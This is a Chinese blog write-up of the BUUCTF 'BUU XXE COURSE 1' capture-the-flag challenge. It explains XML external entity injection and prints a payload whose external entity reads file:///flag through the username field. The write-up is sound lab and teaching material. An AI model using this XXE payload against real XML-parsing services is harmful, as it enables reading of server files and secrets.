BUUCTF/BUU XXE COURSE 1

最新推荐文章于 2024-06-21 20:56:56 发布
最新推荐文章于 2024-06-21 20:56:56 发布
阅读量784 收藏 3
点赞数 22
分类专栏: BUUCTF闯关合集 文章标签: linux 网络 运维 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44041994/article/details/136928175
版权

题目

在这里插入图片描述

步骤

打开页面发现是一个登录页面

随意输入数据并登录,发现弹窗

在这里插入图片描述

通过brup suite抓包发现,数据包上传的是xml数据

在这里插入图片描述

所以可能存在xxe漏洞

xxe全称是"xml external entity injection",意为xml外部实体注入

原理是攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行

服务端接收和解析来自用户端的xml数据,而没有做严格的安全控制,从而导致xml外部实体注入

构造payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY admin SYSTEM "file:///flag">       //创建外部实体
]>
<root>
	<username>&admin;</username>            //调用外部实体
	<password>1</password>
</root>

最终获得flag

在这里插入图片描述

输入flag,闯关成功

在这里插入图片描述

思风
关注
  • 22
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
apachecn#apachecn-ctf-wiki#[WP/BUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUUCTF basic BUU XSS COURSE 1 & BUU XXE COURSE 1
网安小趴菜
09-03 6018
BUUCTF basic BUU XSS COURSE 1 & BUU XXE COURSE 1
[BT]BUUCTF刷题第12天(3.31)
Bluetuan的博客
04-01 483
经过尝试,在这里不管用,要用X-Real-IPBP抓包添加(注意这一行前面不要有空行)发送后返回提示了用户名和密码,这里直接给了,登录即可成功拿到flag。
XXE学习(with BUU XXE COURSE1)
I_ET5u5的博客
04-13 354
进行一个XXE的学
BUU XXE COURSE
m0_62879498的博客
03-26 3085
BUU XXE COURSE 我们发现输入得用户名以 弹窗(alert) 的形式输出 同时 F12 进行前端查看 发现 在提交按钮处有 <button id="go" onclick="XMLFunction()">GO!</button> 说明我们的 数据传输方式为 xml 当然,我们也可以直接 在burp suite 进行抓包查看 我们看到了 xml 文档声明: <?xml version="1.0" encoding="UTF-8"?> 所以,可能存在 xx
XXE(xml外部实体注入漏洞)
qq_43294348的博客
01-15 998
BUU XXE COURSE 1 1漏洞破解
BUU XXE COURSE 1 【basic】
weixin_52942048的博客
10-07 351
看到username取到了admin变量的内容。发现请求参数是xml格式。
网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6131
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUUCTF Basic 解题记录--BUU XXE COURSE
weixin_43171033的博客
10-08 574
2、了解了XXE漏洞,用burpsuite获取到的url转发给repeater,修改XML的信息,引入外部实体漏洞,修改发送内容,即可查看到flag信息。定义admin的外部实体,里面的命令是查看flag的信息。
BUU LFI COURSE 1-1
fdmssmf的博客
08-05 2909
BUU LFI COURSE 1 1 直接url后面添加/?file=/flag
Linux】Xshell和Xftp简介_安装_VMware虚拟机使用
wosixiaokeai的博客
06-19 1254
Xftp是一个功能强大的SFTP、FTP文件传输软件,它允许MS Windows用户安全地在UNIX/Linux和Windows PC之间传输文件。Xftp支持SFTP协议,确保所有通过该软件的网络流量都是加密的。它采用了标准的Windows风格的向导,用户界面直观易用,可以很好地与其他Windows应用程序协同工作。Xftp的特色功能包括同步功能、直接编辑远程文件、多窗格支持、文件交换协议(FXP)支持等,这些功能使得文件传输更加容易和快捷。
Linux中文件查找相关命令比较
lurenyi168的专栏
06-16 466
Linux中与文件定位的命令有find、locate、whereis、which,type。
Linux开发讲课7---Linux sysfs文件系统
最新发布
qq_42837317的博客
06-21 828
Sysfs通过文件和目录的方式组织信息,其中每个文件或目录对应于系统中的一个设备、驱动程序或者其他内核对象。当内核中的设备、驱动程序等对象被创建时,相应的Kobject也会被创建,然后通过Sysfs将其信息暴露给用户空间。Sysfs通常被挂载在/sys目录下,它提供了一种方便的方式,让用户空间的程序可以动态地获取和管理系统中的设备信息,而无需直接访问内核数据结构。(2)创建sysfs文件。其中attr表示将要创建的文件(属性),而show和store分别表示对应的sysfs文件在读和写操作时的回调函数。
BUU SQL COURSE 1
07-27
- *2* [Buuctf | BUU SQL COURSE 1](https://blog.csdn.net/m_de_g/article/details/122174226)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值